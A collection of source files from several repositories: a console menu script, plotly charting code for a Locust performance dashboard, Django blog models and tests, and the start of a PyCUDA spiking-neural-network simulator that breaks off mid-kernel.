print(Colorate.Horizontal(Colors.yellow_to_red, creator, 1))
print(" ")
print(" ")
# CODE
# DEFINE MAIN
def main():
os.system("cls") # CLEAN SCREEN
intro() # PRINT LOGO
print(Colorate.Horizontal(Colors.yellow_to_red, tables)) # PRINT TABLES
cmd = input("-> ")
if cmd == "1": # GO TO ONE
one()
elif cmd == "2": # GO TO TWO
two()
elif cmd == "3": # GO TO THREE
three()
def one(): # DEFINE ONE
input(Colorate.Horizontal(Colors.yellow_to_red, "Choice one"))
main()
def two(): # DEFINE TWO
input(Colorate.Horizontal(Colors.yellow_to_red, "Choice two"))
main()
def three(): # DEFINE THREE
input(Colorate.Horizontal(Colors.yellow_to_red, "Choice three"))
main()
while True:
main()
``` |
{
"source": "4m1t0/performance-dashboard",
"score": 3
} |
#### File: scripts/modules/PerformanceReport.py
```python
import datetime
import logging
import pandas as pd
import plotly.offline as offline
import plotly.graph_objs as go
import sys
class PerformanceReport:
def __init__(self, reports):
"""Performance Report as pandas DataFrame.
Args:
reports [pandas.DataFrame]: Having performance test reports and \
following columns.
1. Name: test target.
2. # requests: number of requests.
3. 99%: 99%tile Latency. any %tile Latency is available \
because you have to assign key when plotting charts.
4. Median response time: 50%tile Latency.
5. Average response time: ditto.
6. Min response time: ditto.
7. Max response time: ditto.
8. # failures: number of failures.
9. Requests/s: requests per second.
10: DateTime [pandas.TimeStamp]: date executed test.
"""
self.fontsize = 11
self.reports = reports
self.reports.sort_values('DateTime', ascending=True, inplace=True)
def percentilePlot(self, name=None, key=None, filename=None):
if key is None or filename is None:
logging.critical(
'Invalid Usage: Please assign both key and filename.')
sys.exit(1)
data = []
if name is None:
names = sorted(self.reports['Name'].unique(), reverse=False)
for name in names:
data.append(self._Scatter(name, key, 'Latency'))
else:
data.append(self._Scatter(name, key, 'Latency'))
key = key + 'tile' if '%' in key else key.split(' ')[0]
layout = go.Layout(
title=key + ' Latency Timeline Chart',
xaxis=dict(gridcolor='#2B3D59', zeroline=False),
yaxis=dict(title='Latency (ms)',
gridcolor='#2B3D59', zeroline=False),
paper_bgcolor="rgba(0,0,0,0)",
plot_bgcolor="rgba(0,0,0,0)",
font=dict(color="#F2F2F2", size=self.fontsize),
legend=dict(x=1, y=0.5),
margin=dict(pad=2))
fig = go.Figure(data=data, layout=layout)
offline.plot(fig, filename=filename, auto_open=False)
def _Scatter(self, name, key, label):
text = [
'DateTime: ' +
d.astype('M8[ms]').astype('O').isoformat().replace('T', ' ')
+ '<br>' + label + ': ' + str(l)
for d, l in zip(
self.reports[self.reports['Name'] == name]['DateTime'].values,
self.reports[self.reports['Name'] == name][key].values)]
return go.Scatter(
x=self.reports[self.reports['Name'] == name]['DateTime'],
y=self.reports[self.reports['Name'] == name][key],
name=name,
text=text,
hoverinfo='text+name'
)
def rpsTimelineChart(self, name=None, filename=None):
if filename is None:
logging.critical(
'Invalid Usage: Please assign both name and filename.')
sys.exit(1)
data = []
if name is None:
names = sorted(self.reports['Name'].unique(), reverse=False)
for name in names:
data.append(self._Scatter(name, 'Requests/s', 'Requests/s'))
else:
data.append(self._Scatter(name, 'Requests/s', 'Requests/s'))
layout = go.Layout(
title='Rps Timeline Chart',
xaxis=dict(gridcolor='#2B3D59', zeroline=False),
yaxis=dict(gridcolor='#2B3D59', zeroline=False),
paper_bgcolor="rgba(0,0,0,0)",
plot_bgcolor="rgba(0,0,0,0)",
font=dict(color="#F2F2F2", size=self.fontsize),
legend=dict(x=1, y=0.5),
margin=dict(pad=2))
fig = go.Figure(data=data, layout=layout)
offline.plot(fig, filename=filename, auto_open=False)
def requestsTimelineChart(self, key=None, title=None, filename=None):
if key is None or title is None or filename is None:
logging.critical(
'Invalid Usage: Please assign both key and filename.')
sys.exit(1)
names = sorted(self.reports['Name'].unique(), reverse=False)
data = []
for name in names:
t = key.split(' ')
text = [
'DateTime: ' +
d.astype('M8[ms]').astype('O').isoformat().replace('T', ' ')
+ '<br>' + t[0] + ' of ' + t[1] + ': ' + str(l)
for d, l in zip(
self.reports[self.reports['Name']
== name]['DateTime'].values,
self.reports[self.reports['Name'] == name][key].values)]
data.append(go.Scatter(
x=self.reports[self.reports['Name'] == name]['DateTime'],
y=self.reports[self.reports['Name'] == name][key],
name=name,
text=text,
hoverinfo='text+name'
))
layout = go.Layout(
title=title,
xaxis=dict(gridcolor='#2B3D59', zeroline=False),
yaxis=dict(gridcolor='#2B3D59', zeroline=False),
paper_bgcolor='rgba(0,0,0,0)',
plot_bgcolor='rgba(0,0,0,0)',
font=dict(color='#F2F2F2', size=self.fontsize),
legend=dict(x=1, y=0.5),
margin=dict(pad=2))
fig = go.Figure(data=data, layout=layout)
offline.plot(fig, filename=filename, auto_open=False)
def activityChart(self, filename=None):
now = datetime.datetime.now()
d_now = datetime.date(now.year, now.month, now.day)
offset = 0
delta = 365 + offset
pre_d_last_year = d_now - datetime.timedelta(days=delta)
if pre_d_last_year.weekday():
offset = pre_d_last_year.weekday()
d_last_year = d_now - datetime.timedelta(days=delta)
# gives me a list with datetimes for each day a year
dates_in_year = [d_last_year +
datetime.timedelta(i) for i in range(delta+1)]
# gives [0,1,2,3,4,5,6,0,1,2,3,4,5,6,…] (ticktext in xaxis dict translates this to weekdays
weekdays_in_year = [-1 * i.weekday() for i in dates_in_year]
# gives [1,1,1,1,1,1,1,2,2,2,2,2,2,2,…] name is self-explanatory
start_dates_of_week = [
d - datetime.timedelta(days=d.weekday()) if d.weekday() else d
for d in dates_in_year]
# z = np.random.randint(3, size=(len(dates_in_year))) / 2
df = pd.DataFrame({
'start_date': start_dates_of_week,
'weekday': weekdays_in_year,
'z': 0,
'commits': 0
})
# count contributions per a day
for report in self.reports['DateTime'].unique():
report_date = report.astype('M8[D]').astype('O')
weekday = report_date.weekday()
start_date_of_week = report_date - \
datetime.timedelta(days=weekday)
target_record = df[
(df['start_date'] == start_date_of_week) &
(df['weekday'] == -1 * weekday)]
if not target_record.empty:
df.loc[(df['start_date'] == start_date_of_week) &
(df['weekday'] == -1 * weekday), ['z']] \
= target_record['z'] + 1 \
if target_record['z'].values[0] < 2 else 2
df.loc[(df['start_date'] == start_date_of_week) &
(df['weekday'] == -1 * weekday), ['commits']] \
= target_record['commits'] + 1
# gives something like list of strings like '2018-01-25' for each date. Used in data trace to make good hovertext.
text = []
for date in dates_in_year:
start_date_of_week = date - \
datetime.timedelta(days=date.weekday())
commit = df[
(df['start_date'] == start_date_of_week) &
(df['weekday'] == -1 * date.weekday())]['commits']
s = 'date: ' + str(date) + '<br>commits: ' + str(commit.values[0])
text.append(s)
data = [
go.Heatmap(
x=df['start_date'],
y=df['weekday'],
z=df['z'],
text=text,
hoverinfo='text',
xgap=3, # this
ygap=3, # and this is used to make the grid-like apperance
showscale=False,
colorscale=[
[0, '#223147'],
[0.5, '#00CC69'],
[1, '#66FA16']]
)
]
layout = go.Layout(
title='Activity Chart',
height=380,
yaxis=dict(
showline=False, showgrid=False, zeroline=False,
tickmode='array',
ticktext=['Sun', 'Sat', 'Fri', 'Thu', 'Wed', 'Tue', 'Mon'],
tickvals=[-6, -5, -4, -3, -2, -1, 0]
),
xaxis=dict(
showline=False, showgrid=False, zeroline=False,
side='top'
),
paper_bgcolor='rgba(0,0,0,0)',
plot_bgcolor='rgba(0,0,0,0)',
font=dict(color='#F2F2F2', size=11),
margin=dict(t=150, b=0, pad=5)
)
fig = go.Figure(data=data, layout=layout)
offline.plot(fig, filename=filename, auto_open=False)
def distributedDotPlot(self, name=None, filename=None):
if name is None or filename is None:
logging.critical(
'Invalid Usage: Please assign both key and filename.')
sys.exit(1)
df = self.reports[self.reports['Name'] == name].sort_values(
'DateTime', ascending=True, inplace=False)
keys = [
'50%',
'66%',
'75%',
'80%',
'90%',
'95%',
'98%',
'99%',
'Average response time',
'Min response time',
'Max response time'
]
data = []
for d in df['DateTime'].values:
date = d.astype('M8[ms]').astype('O')
date_for_label = date.isoformat().replace('T', ' ')
for key in keys:
if 'time' in key:
df[key.split(' ')[0].lower()] = df[key]
key = key.split(' ')[0].lower()
color = '#FF1744' if key == '99%' else '#7986CB'
data.append(go.Scatter(
x=df[df['DateTime'] == d][key],
y=[date.isoformat().replace('T', '<br>')],
text=['DateTime: ' + date_for_label + '<br>Latency: ' + str(l)
for l in df[df['DateTime'] == d][key].values],
name=key,
hoverinfo='text+name',
marker=dict(color=color)
))
layout = go.Layout(
title='Distribution of Latency',
xaxis=dict(title='Latency (ms)',
gridcolor='#2B3D59', zeroline=False),
yaxis=dict(gridcolor='#2B3D59', zeroline=False),
paper_bgcolor='rgba(0,0,0,0)',
plot_bgcolor='rgba(0,0,0,0)',
font=dict(color='#F2F2F2', size=11),
showlegend=False,
margin=dict(pad=3))
fig = go.Figure(data=data, layout=layout)
offline.plot(fig, filename=filename, auto_open=False)
def degradationPlot(self, name=None, key=None, filename=None):
if name is None or key is None or filename is None:
logging.critical(
'Invalid Usage: Please assign name, key and filename.')
sys.exit(1)
df = self.reports[self.reports['Name'] == name]
df_new = df.assign(diff=df[key].diff().fillna(0))
text = ['DateTime: ' +
d.astype('M8[ms]').astype('O').isoformat().replace('T', ' ')
+ '<br>Degraded Latency: ' + str(r)
for d, r in zip(
df_new['DateTime'].values, df_new['diff']
)]
data = [go.Scatter(
x=df_new['DateTime'],
y=df_new['diff'],
name=name,
mode='lines+markers',
text=text,
hoverinfo='text+name'
)]
layout = go.Layout(
title=key + 'tile Latency Degradation Timeline Chart',
xaxis=dict(gridcolor='#2B3D59', zeroline=False),
yaxis=dict(title='Latency (ms)',
gridcolor='#2B3D59', zeroline=False),
paper_bgcolor="rgba(0,0,0,0)",
plot_bgcolor="rgba(0,0,0,0)",
font=dict(color="#F2F2F2", size=self.fontsize),
legend=dict(x=1, y=0.5),
margin=dict(pad=2))
fig = go.Figure(data=data, layout=layout)
offline.plot(fig, filename=filename, auto_open=False)
```
#### File: scripts/modules/PreProcessor.py
```python
import datetime
import logging
import pandas as pd
import os
import sys
from .processors import LocustResourceProcessor
class PreProcessor:
RESOURCES = ['LOCUST']
def __init__(self, resource, time_formatter, *args, **kwargs):
if resource not in PreProcessor.RESOURCES:
logging.critical(
'Invalid Usage: Please assign a resource defined in '
+ 'PreProcessor.RESOURCES.')
sys.exit(1)
if resource == 'LOCUST':
if 'distribution_filename' in kwargs \
and 'requests_filename' in kwargs:
self.resource_processor = LocustResourceProcessor. \
LocustResourceProcessor(
distribution_filename=kwargs['distribution_filename'],
requests_filename=kwargs['requests_filename'])
elif 'distribution_filename' in kwargs:
self.resource_processor = LocustResourceProcessor. \
LocustResourceProcessor(
distribution_filename=kwargs['distribution_filename'])
elif 'requests_filename' in kwargs:
self.resource_processor = LocustResourceProcessor. \
LocustResourceProcessor(
requests_filename=kwargs['requests_filename'])
else:
self.resource_processor = LocustResourceProcessor. \
LocustResourceProcessor()
self.time_formatter = time_formatter
def process(self, reports_path):
"""Performance Report as pandas DataFrame.
Args:
reports_dir: directory having directory \
which includes locust reports.
Returns:
reports [pandas.DataFrame]: Having performance test reports and \
following columns.
1. Name: test target.
2. # requests: number of requests.
3. 99%: 99%tile Latency. any %tile Latency is available \
because you have to assign key when plotting charts.
4. Median response time: 50%tile Latency.
5. Average response time: ditto.
6. Min response time: ditto.
8. Max response time: ditto.
4. # failures: number of failures.
9. Requests/s: requests per second.
10: DateTime [pandas.TimeStamp]: date executed test.
"""
report_dirs = [f for f in os.listdir(reports_path) if os.path.isdir(
os.path.join(reports_path, f))]
reports_df = None
for report_dir in report_dirs:
tmp_df = self._process(reports_path, report_dir)
if reports_df is None:
reports_df = tmp_df
else:
reports_df = pd.concat([reports_df, tmp_df], ignore_index=True)
return reports_df
def _process(self, reports_path, report_dir):
year, month, day, hour, minute, second = self.time_formatter.format(
report_dir)
report_df = self.resource_processor.process(reports_path + report_dir)
report_df['DateTime'] = datetime.datetime(
year=year, month=month, day=day,
hour=hour, minute=minute, second=second)
report_df.sort_values('DateTime', ascending=True, inplace=True)
return report_df
```
#### File: python/scripts/PerformanceVisualizer.py
```python
from modules import PerformanceReport, PreProcessor, TimeFormatter
import os
class PerformanceVisualizer:
def __init__(self, preprocessor):
self.preprocessor = preprocessor
self.keys = [
'50%',
'66%',
'75%',
'80%',
'90%',
'95%',
'98%',
'99%',
'Average response time',
'Min response time',
'Max response time'
]
def visualize(self, path):
reports = self.preprocessor.process(path)
static_dir = os.path.join(
os.path.dirname(__file__),
'../../javascript/static')
if not os.path.isdir(static_dir + '/shared'):
os.makedirs(static_dir + '/shared')
performance_report = PerformanceReport.PerformanceReport(reports)
performance_report.percentilePlot(
key='99%',
filename=static_dir +
'/shared/99percentiles.html')
performance_report.rpsTimelineChart(
filename=static_dir
+ '/shared/rps-timeline-chart.html')
performance_report.requestsTimelineChart(
key='# requests',
title='# of requests',
filename=static_dir +
'/shared/num-of-requests.html')
performance_report.requestsTimelineChart(
key='# failures',
title='# of failures',
filename=static_dir +
'/shared/num-of-errors.html')
performance_report.activityChart(
filename=static_dir +
'/shared/activity-chart.html')
uniq_reports = sorted(reports['Name'].unique())
for uniq_report in uniq_reports:
additional_path = 'total/' if uniq_report == 'Total' \
else ''.join(
uniq_report.split(' ')).lower() + '/'
plot_path = static_dir + '/' + additional_path
if not os.path.isdir(plot_path):
os.makedirs(plot_path)
performance_report.distributedDotPlot(
name=uniq_report,
filename=plot_path
+ 'distributed-dot-plot.html')
performance_report.rpsTimelineChart(
name=uniq_report,
filename=plot_path
+ 'rps-timeline-chart.html')
for key in self.keys:
prefix = key.split(' ')[0].lower(
) if 'time' in key else key[:2] + 'percentile'
performance_report.percentilePlot(
name=uniq_report,
key=key,
filename=plot_path
+ prefix + '-timeline-chart.html')
performance_report.degradationPlot(
name=uniq_report,
key=key,
filename=plot_path
+ prefix + '-degradation-timeline-chart.html')
time_formatter = TimeFormatter.TimeFormatter('YYYYMMDD_HHMMSS1')
visualizer = PerformanceVisualizer(
PreProcessor.PreProcessor('LOCUST', time_formatter))
visualizer.visualize(
os.path.join(os.path.dirname(__file__), '../resources/reports/'))
``` |
{
"source": "4madeuz/django_example",
"score": 2
} |
#### File: core/context_processors/year.py
```python
def year(request):
"""Добавляет переменную с текущим годом."""
return {
'year': '{% now "Y" %}',
}
# без наличия функции year хоть в каком-то виде тесты ломаются,
# а в footer.html я это не использую
```
#### File: yatube/posts/models.py
```python
from django.contrib.auth import get_user_model
from django.db import models
from django.contrib import admin
import datetime
from django.utils import timezone
User = get_user_model()
class Group(models.Model):
title = models.CharField(max_length=200)
slug = models.SlugField(unique=True)
description = models.TextField()
def __str__(self):
return self.title
class Post(models.Model):
text = models.TextField()
pub_date = models.DateTimeField(auto_now_add=True)
group = models.ForeignKey(Group, on_delete=models.SET_NULL,
blank=True, null=True, related_name='posts')
author = models.ForeignKey(
User,
on_delete=models.CASCADE,
related_name='posts',
)
image = models.ImageField(
'Картинка',
upload_to='posts/',
blank=True
)
class Meta:
ordering = ['-pub_date']
def __str__(self):
return self.text[:15]
class Comment(models.Model):
text = models.TextField()
created = models.DateTimeField(auto_now_add=True)
post = models.ForeignKey(
Post,
on_delete=models.CASCADE,
related_name='comments')
author = models.ForeignKey(
User,
on_delete=models.CASCADE,
related_name='comments')
class Follow(models.Model):
user = models.ForeignKey(
User,
on_delete=models.CASCADE,
related_name='follower',)
author = models.ForeignKey(
User,
on_delete=models.CASCADE,
related_name='following',
)
class Meta:
db_table = 'app_version'
constraints = [
models.UniqueConstraint(
fields=['user', 'author'], name='unique_following')
]
class Question(models.Model):
question_text = models.CharField(max_length=200)
pub_date = models.DateTimeField('date published')
@admin.display(
boolean=True,
ordering='pub_date',
description='Published recently?',
)
def was_published_recently(self):
now = timezone.now()
return now - datetime.timedelta(days=1) <= self.pub_date <= now
class Choice(models.Model):
question = models.ForeignKey(Question, on_delete=models.CASCADE)
choice_text = models.CharField(max_length=200)
votes = models.IntegerField(default=0)
```
#### File: posts/tests/test_froms.py
```python
from django.contrib.auth import get_user_model
from django.core.files.uploadedfile import SimpleUploadedFile
from django.test import Client, TestCase
from django.urls import reverse
from posts.forms import PostForm
from posts.models import Comment, Group, Post
User = get_user_model()
class PostsFormsTests(TestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.group = Group.objects.create(
title='Тестовый заголовок',
description='Тестовое описание',
slug='test-slug'
)
cls.author = User.objects.create_user(username='HasNoName')
cls.post = Post.objects.create(
text='Пост',
author=cls.author,
group=cls.group,
)
cls.form = PostForm()
def setUp(self):
self.user = User.objects.get(username=PostsFormsTests.author.username)
self.authorized_client = Client()
self.authorized_client.force_login(self.user)
def test_create_post(self):
'''При создании поста появляется запись в бд'''
post_count = Post.objects.count()
small_gif = (
b'\x47\x49\x46\x38\x39\x61\x02\x00'
b'\x01\x00\x80\x00\x00\x00\x00\x00'
b'\xFF\xFF\xFF\x21\xF9\x04\x00\x00'
b'\x00\x00\x00\x2C\x00\x00\x00\x00'
b'\x02\x00\x01\x00\x00\x02\x02\x0C'
b'\x0A\x00\x3B'
)
uploaded = SimpleUploadedFile(
name='small.gif',
content=small_gif,
content_type='image/gif'
)
form_data = {
'text': 'NewPost',
'group': PostsFormsTests.group.id,
'image': uploaded
}
response = self.authorized_client.post(
reverse('posts:post_create'),
data=form_data,
follow=True
)
self.assertRedirects(response,
reverse('posts:profile',
kwargs={'username':
PostsFormsTests.author.username}))
self.assertEqual(Post.objects.count(), post_count + 1)
self.assertTrue(
Post.objects.filter(
text=form_data['text'],
group=PostsFormsTests.group
).exists()
)
def test_post_edit(self):
post_count = Post.objects.count()
form_data = {
'text': 'NewPost'
}
response = self.authorized_client.post(
reverse('posts:post_edit', args=f'{PostsFormsTests.post.id}'),
data=form_data,
follow=True
)
self.assertRedirects(response,
reverse('posts:post_detail',
kwargs={'post_id':
PostsFormsTests.post.id}))
self.assertEqual(Post.objects.count(), post_count)
self.assertTrue(
Post.objects.filter(
text=form_data['text'],
).exists()
)
def test_comment(self):
form_data = {
'text': 'NewComment'
}
comment_count = Comment.objects.count()
response = self.authorized_client.post(
reverse('posts:add_comment', args=f'{PostsFormsTests.post.id}'),
data=form_data,
follow=True
)
self.assertEqual(Comment.objects.count(), comment_count + 1)
self.assertContains(response, 'NewComment')
``` |
{
"source": "4martin/snn-simulator-example",
"score": 3
} |
#### File: 4martin/snn-simulator-example/snn-simulator.py
```python
import pycuda.driver as cuda
import pycuda.autoinit
import pycuda.gpuarray as gpuarray
from pycuda.compiler import SourceModule
from scipy.sparse import *
import numpy
import random
import sys
INPUT_VECTOR_SIZE = 2 # inputs of one neuron
SYNAPSES_VECTOR_SIZE = 2 # synapsesination connections of one neuron
NEURONS_IN_GROUP = 4 # number of neurons in a group
MAX_THRESHOLD = 1 # threshold for spiking
GROUPS_AMOUNT = 2 # number of neurons groups (correspond to blocks on the GPU)
def show_configuration():
print "###################################################"
print "# for each neuron:"
print "# max number of inputs: %d" % INPUT_VECTOR_SIZE
print "# max number of synapses: %d" % SYNAPSES_VECTOR_SIZE
print "#"
print "# neurons in a group: %d" % NEURONS_IN_GROUP
print "# number of groups: %d" % (GROUPS_AMOUNT)
print "# total neurons: %d" % (NEURONS_IN_GROUP*GROUPS_AMOUNT)
print "# max threshold: %d" % MAX_THRESHOLD
print "###################################################"
def debug(title, var):
print title+':'
print var
print "###################################################"
def divide_network_to_groups():
# NOT IMPLEMENTED
# divide to groups with minimal inter-group connections
# under maximum group size restriction (block size in the GPU)
# It is a graph-cut problem - graph partitioning optimizing edges cut to minimum
# while satisfying additional conditions.
#
# ref:
# http://romainbrette.fr/WordPress3/wp-content/uploads/2014/06/BretteGoodman2012.pdf
#
# instead - an example network with GROUPS_AMOUNT dense groups and minor inter-group connection is built:
# create all groups
GI=NEURONS_IN_GROUP*INPUT_VECTOR_SIZE # group inputs
GS=NEURONS_IN_GROUP*SYNAPSES_VECTOR_SIZE # group synapses
g = numpy.zeros((GI*GROUPS_AMOUNT,GS*GROUPS_AMOUNT)) # large (sparse) matrixi
g = g.astype(numpy.float32)
# weights: between 0.0-1.0 for each of inputs
# indices:
# (rows) input#, (columns) synapse#
# inside group connections:
for i in range(GROUPS_AMOUNT):
g[0+i*GI,6+i*GS]=0.2 # on group #0, #0 synapse of neuron #3 connects to #0 input of neuron #0 with weight 0.2
g[1+i*GI,2+i*GS]=0.6
g[2+i*GI,7+i*GS]=0.5
g[3+i*GI,4+i*GS]=0.7
g[4+i*GI,0+i*GS]=0.4
g[6+i*GI,5+i*GS]=0.8
#g[5+i*GI,1+i*GS]=0.7123
# inter-group connections
# group 1 depends on group 0
g[7+1*GI,3+0*GS]=0.9 # #1 synapse of neuron #2 in group #0 connects to #1 input of neuron #3 in group #1
numpy.set_printoptions(linewidth=10000)
print g
return g
def get_weights_graph():
# Assuming that the connection matrix is sparse, the data
# structure used is compressed Sparse Row/Column matrix.
# The CSR high efficiency of rows are used for the weights to target neurons,
# to achieve coalesced memory access during spike distribution.
# http://homepages.cwi.nl/~sbohte/publication/slazynski2012network.pdf
#
# A dense representation haa NEURONS_IN_GROUP*SYNAPSES_VECTOR_SIZE
# columns and NEURONS_IN_GROUP*INPUT_VECTOR_SIZE rows, each stating the
# the corresponding wight or a zero for no connection. Each neuron spans over
# SYNAPSES_VECTOR_SIZE columns and INPUT_VECTOR_SIZE rows.
# Groups of neurons (more dense connections) are located in neighbour indices, so
# they land in the same block letting them run for longer periods while using
# shared memory, until they need to connect to another group which runs on
# a different block.
#
# neuron synapses X
# ----------------------------------------- >
# |██████| | | | |
# |██████| | | | |
# |██████| | | | |
# |██████| | | | |
# |------- | | | |
# |--------|--------|--------|--------|----
# | . |███| | | . |
# n | |---- | | |
# e | | | | |
# u | | | | |
# r |--------|--------|--------|--------|----
# o | | . |██████| | |
# n | | |██████| | . |
# | | |██████| | |
# i | | |------- | |
# n |--------|--------|--------|--------|----
# p | . | | |█████| |
# u | | | |█████| |
# t | | | |------ |
# s | | | | |
# |--------|--------|--------|--------|----
# Y v
#
# This is a Weights matrix (W):
# =============================
# Each of the large squares (16) represents synapses of neurons group (on axis X) connecting
# to inputs of neurons group (on axis Y).
# On the diagonal there are (smaller) squares representing (dense) connections inside
# a group. The dots on other squares represent inter-group connections.
# The matrix is splitted to vertical slices, each containing neurons with synapses from one group.
# Each group runs later on a separate GPU block.
# When a spike goes to a neuron in another block there is a mechanism that updates the required block.
#
# The CSR representation of the above matrix is:
# A - an array of all non-zero weights (right to left, top down)
# B - an array where value in place i is the A-index of the first non-zero number on row i of W.
# The size |A| is added to B.
# C - an array of the column indices in W of each of A items.
#
# A block that has dependency needs to get periodic approvals until which clock step it
# may run. A bidirectional dependency between blocks can be solved by running each time
# during some fixed clock slices (e.g. 1000 clocks). If no spikes were done, just continue
# with the next slice. If a spike was emitted, cut the slice to 1/2 and repeat calculation
# on both blocks. Update the corresponding spike as needed.
#
groups=divide_network_to_groups()
CSC_groups=[]
CSC_vectors_lengths=numpy.zeros(3*GROUPS_AMOUNT, dtype=numpy.float32)
CSC_vectors_start_index=numpy.zeros(3*GROUPS_AMOUNT, dtype=numpy.float32)
# split large matrix to GROUPS_AMOUNT group slices
for i in range(GROUPS_AMOUNT):
g_slice=groups[:,i*SYNAPSES_VECTOR_SIZE*NEURONS_IN_GROUP:(i+1)*SYNAPSES_VECTOR_SIZE*NEURONS_IN_GROUP]
#print "slice ...."
#print g_slice
m=csc_matrix(g_slice)
A=m.data
B=m.indptr
C=m.indices
#print A,B,C
# keep vector (of CSC representation for each group) lengths
CSC_vectors_lengths[0+i*3]=len(A)
CSC_vectors_lengths[1+i*3]=len(B)
CSC_vectors_lengths[2+i*3]=len(C)
#print "CSC_vectors_lengths ", CSC_vectors_lengths
if i<(GROUPS_AMOUNT-1):
# check on which location each vector begins
# next vector begins at the previous location + its vector length
# this is needed for in-kernel vectors usage optimization
CSC_vectors_start_index[0+(i+1)*3]=CSC_vectors_start_index[0+i*3]+len(A)
CSC_vectors_start_index[1+(i+1)*3]=CSC_vectors_start_index[1+i*3]+len(B)
CSC_vectors_start_index[2+(i+1)*3]=CSC_vectors_start_index[2+i*3]+len(C)
#print "CSC_vectors_start_index ", CSC_vectors_start_index
CSC_groups.append([A,B,C])
return CSC_groups,CSC_vectors_start_index,CSC_vectors_lengths
def run():
show_configuration()
# get network
CSC_groups,CSC_vectors_start_index,CSC_vectors_lengths=get_weights_graph()
# concat all CSC vectors to simplify load to GPU
# calculate total lengths
concat_vectors_lengths=numpy.zeros(3, dtype=numpy.float32)
j=0
for i in CSC_vectors_lengths:
concat_vectors_lengths[j%3]+=CSC_vectors_lengths[j] # calculate total lengths for all A,B,C
j+=1
# allocate concatenated vectors
ccA=numpy.zeros(concat_vectors_lengths[0], dtype=numpy.float32)
ccB=numpy.zeros(concat_vectors_lengths[1], dtype=numpy.float32)
ccC=numpy.zeros(concat_vectors_lengths[2], dtype=numpy.float32)
# concating all A in to ccA, B to ccB and C to ccC
ccA_counter=0
ccB_counter=0
ccC_counter=0
for i in range(GROUPS_AMOUNT):
A,B,C = CSC_groups[i]
for j in range(CSC_vectors_lengths[0+i*3]): # run over each A length
ccA[j+ccA_counter]=A[j]
ccA_counter=j+1
for j in range(CSC_vectors_lengths[1+i*3]): # run over each B length
ccB[j+ccB_counter]=B[j]
ccB_counter=j+1
#print "range: ",CSC_vectors_lengths[2+i*3]
for j in range(CSC_vectors_lengths[2+i*3]): # run over each C length
#print "ccC index is ", j, " writing ",C[j]
ccC[j+ccC_counter]=C[j]
ccC_counter=j+1
#print "==============> ",concat_vectors_lengths
#print "==============> ",ccA
#print "==============> ",ccC
# more data structures:
# =====================
# Inputs - array. Size according to block size limit from weight matrix.
# Threshold - array per neuron (small).
# Action Potential (AC) - array. Size according to block size limit from weight matrix.
# Fired - array per neuron (small).
# Cross block dependency - matrix per block (small).
# inputs: each is 0 or the corresponding weight
# use one vector for inputs of a whole neurons group
X = numpy.array([0.2,0,0.5,0.7,0.4,0,0,0.9,0.2,0,0.5,0.7,0.4,0,0,0.9])
#X = numpy.array([1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1])
X = X.astype(numpy.float32)
# threshold
TH = MAX_THRESHOLD*numpy.random.rand(NEURONS_IN_GROUP*GROUPS_AMOUNT)
#TH = MAX_THRESHOLD*numpy.zeros(NEURONS_IN_GROUP*GROUPS_AMOUNT)
TH = TH.astype(numpy.float32)
# to gpu
# currently one one group is loaded
# to load the full ndarray, the following can be used:
# http://documen.tician.de/pycuda/array.html#pycuda.gpuarray.GPUArray.set
ccA_gpu = gpuarray.to_gpu(ccA)
ccB_gpu = gpuarray.to_gpu(ccB)
ccC_gpu = gpuarray.to_gpu(ccC)
X_gpu = gpuarray.to_gpu(X)
TH_gpu = gpuarray.to_gpu(TH)
# CSC_vectors_start_index and CSC_vectors_lengths of CSC vectors
CSC_vectors_lengths_gpu = gpuarray.to_gpu(CSC_vectors_lengths)
CSC_vectors_start_index_gpu = gpuarray.to_gpu(CSC_vectors_start_index)
# prepare vectors for results:
# weighted sum
AC_gpu = gpuarray.zeros(NEURONS_IN_GROUP*GROUPS_AMOUNT, dtype=numpy.float32)
# fired
fired_gpu = gpuarray.zeros(NEURONS_IN_GROUP*GROUPS_AMOUNT, dtype=numpy.float32)
################################################################
#
# declare kernel
#
################################################################
kernel_code_template = """
#include <stdio.h>
#define INPUT_VECTOR_SIZE 2
#define SYNAPSES_VECTOR_SIZE 2
#define NEURONS_IN_GROUP 4
#define GROUPS_AMOUNT 2
#define INPUTS_PER_GROUP (INPUT_VECTOR_SIZE*NEURONS_IN_GROUP)
#define GROUP_NUMBER_MASK (INPUTS_PER_GROUP*(GROUPS_AMOUNT-1))
#define MAX_GROUP_UPDATE_QUEUE_LEN 8 // must be 2^n to work with modulo optimization (see atomicAnd below)
#define PERIODIC_UPDATE_CYCLES 4
#define UPDATE_PERIODS 1
// management of inter-group updates on shared memory
__device__ struct update_group_entry {
int clock; // Note: add __padding for alighnment if using 64 bit float
int input;
float weight;
} group_updates_queue[GROUPS_AMOUNT][MAX_GROUP_UPDATE_QUEUE_LEN];
__device__ int first_on_queue[GROUPS_AMOUNT]; // mod MAX_GROUP_UPDATE_QUEUE_LEN
__device__ int already_on_queue[GROUPS_AMOUNT];
volatile __device__ int safe_clock[GROUPS_AMOUNT];
/*
* # neural state update + spike generation:
* # =======================================
* # each input has one of 2 values - 0 or the corresponding weight.
* # each group/block verifies that it is safe to run for the current clock.
* # safe means that if there is dependency on another group - the other block signals updates for inputs
* # on current block at certain clocks, or alternatively no updates until some recent clock.
* # block run on all these inputs of neurons in current block, compare to threshold, and update fired
* # array. When done, zero all inputs (assumption of 1 clock decay of the spike).
*/
__device__ void sigma(float *X, float *AC, float *TH, float *fired, uint clock)
{
const uint tx = threadIdx.x;
const uint bx = blockIdx.x;
const uint vec_num = tx/INPUT_VECTOR_SIZE+bx*NEURONS_IN_GROUP;
int first_index;
// busy loop if no "safe" clock in the future
if(bx==1){ // FIXME: condition should be "is dependent group?"
if (clock>safe_clock[bx]) {
printf("busy loop on block %d clock %d before safe %d\\n", bx, clock, safe_clock[bx]);
} else {
printf("skip busy as clock %d before safe %d\\n", clock, safe_clock[bx]);
}
while(clock>safe_clock[bx]) {
// busy wait
// maybe some variation on _gpu_sync() could be used here.
// http://fulmanski.pl/zajecia/cuda/zajecia_20122013/materialy/TR_GPU_synchronization.pdf
printf("%d, ",clock);
}
}
if (already_on_queue[bx] > 0) { // must update inputs due to spikes from other groups
printf("handling queue for group %d length of %d at clock %d\\n", bx, already_on_queue[bx], clock);
first_index=first_on_queue[bx];
printf("on queue index %d, clock %d, input %d, weight %f\\n", first_index, group_updates_queue[bx][first_index].clock, group_updates_queue[bx][first_index].input, group_updates_queue[bx][first_index].weight);
